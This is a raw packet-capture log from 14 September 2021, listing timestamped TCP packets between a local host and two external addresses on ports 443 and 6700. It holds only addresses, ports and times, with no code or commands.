Sep 14, 2021 16:47:57.693314075 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:57.693336964 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:57.761065960 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:57.813395023 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:57.826421976 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:57.826447964 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.432378054 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.432463884 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.432642937 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.432653904 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.433022976 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.442008972 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.442025900 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.442120075 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.465390921 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.465401888 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.465431929 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.465485096 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.465531111 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.465536118 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.475436926 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.475450039 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.475533009 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.475544930 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.496129990 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.496172905 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.496260881 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.496273041 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.496305943 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.509021044 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.509032965 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.509159088 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.509170055 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.528641939 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.528799057 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.528872967 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.528894901 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.528908014 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.528912067 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.529135942 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.538510084 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.538527966 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.538706064 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.538722992 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.538801908 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.548515081 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.548527002 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.548657894 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.565655947 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.565727949 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.565877914 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.565937996 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.575107098 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.575198889 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.575270891 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.575333118 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.590923071 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.591084957 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.598301888 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.598635912 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.606656075 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.606931925 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.620417118 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.620532990 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.627968073 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.628217936 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.639611959 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.639748096 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.644923925 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.645539045 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.649327993 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.649626017 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.654351950 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.654649973 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.657664061 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.657927990 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.662652969 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.662858009 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.664361000 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.664607048 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.666136026 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.666294098 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.669879913 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.670223951 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.675353050 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.675560951 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.679066896 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.679244995 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.686878920 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.687105894 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.691620111 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.691803932 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.699434042 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.699596882 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.709712982 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.709867001 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.718244076 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.718381882 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.729249954 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.729432106 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.735311985 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.735505104 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.742266893 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.742528915 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.748035908 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.748210907 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.760094881 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.760339022 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.766494989 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.766678095 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.783807993 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.783977032 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.796550989 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.796825886 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.809365988 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.809534073 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.827873945 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.827986956 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.837764978 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.837939978 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.847132921 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.847328901 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.866888046 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.867033958 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.877258062 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.877540112 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.896424055 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.896569967 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.906898022 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.907075882 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.916629076 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.916760921 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.937263012 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.937494040 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.947742939 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.947927952 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.974638939 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.974878073 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:58.986300945 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:58.986471891 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.000252008 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.000500917 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.035809994 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.035975933 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.054872990 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.055141926 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.073520899 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.073612928 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.111579895 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.111752033 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.132345915 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.132488012 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.173187971 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.173350096 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.194349051 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.194454908 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.217084885 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.217222929 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.256900072 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.257051945 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.277407885 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.277595997 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.300576925 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.300721884 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.340934992 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.341097116 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.362061977 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.362231016 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.401799917 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.401907921 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.420414925 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.420887947 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.438251019 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.438309908 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.438409090 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.438424110 CEST	443	49788	144.76.136.153	192.168.2.4
Sep 14, 2021 16:47:59.438575029 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:47:59.439162016 CEST	49788	443	192.168.2.4	144.76.136.153
Sep 14, 2021 16:48:29.641171932 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:29.837929964 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:29.838057041 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:29.902769089 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.109731913 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.156147003 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.347693920 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.379925966 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.626266003 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.626295090 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.626492977 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.626555920 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.626578093 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.626748085 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.661689043 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.817625046 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817650080 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817677021 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817749977 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817790985 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.817799091 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817863941 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.817872047 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817898989 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.817935944 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.817965984 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.818011999 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:30.818044901 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.818099976 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:30.908205986 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010288000 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010548115 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010569096 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010647058 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010689974 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.010796070 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010859966 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.010914087 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.010981083 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.010984898 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011007071 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011162043 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.011281967 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011308908 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011384010 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011403084 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011459112 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.011502981 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011512041 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.011564016 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011710882 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011729002 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.011730909 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.011805058 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.202239037 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.202291012 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.202405930 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.202447891 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.202729940 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.202899933 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.202924967 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203073978 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203164101 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.203229904 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203468084 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203541994 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203552008 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.203695059 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203763962 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.203857899 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.203970909 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204037905 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.204087973 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204272032 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204339027 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.204428911 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204466105 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204540014 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204545975 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.204632044 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204715014 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204729080 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.204777002 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204849958 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.204868078 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205091000 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205132008 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205161095 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205199957 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205327034 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205368996 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205427885 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205492973 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205543041 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205575943 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205627918 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205713987 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205782890 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205857992 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.205892086 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.205950975 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.206021070 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.393790007 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.393925905 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394028902 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394047022 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.394184113 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394257069 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.394346952 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394551992 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394624949 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394679070 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.394768000 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.394823074 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.394886017 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395152092 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395217896 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.395271063 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395328045 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395418882 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395457029 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.395584106 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395658970 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.395790100 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395847082 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.395895958 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.395937920 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396105051 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396168947 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.396246910 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396356106 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396425009 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.396537066 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396745920 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.396812916 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.397002935 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397026062 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397181988 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.397254944 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397375107 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397471905 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397532940 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.397716045 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397820950 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.397842884 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397870064 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.397979975 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.397989988 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398127079 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398250103 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.398348093 CEST	6700	49833	194.147.140.20	192.168.2.4
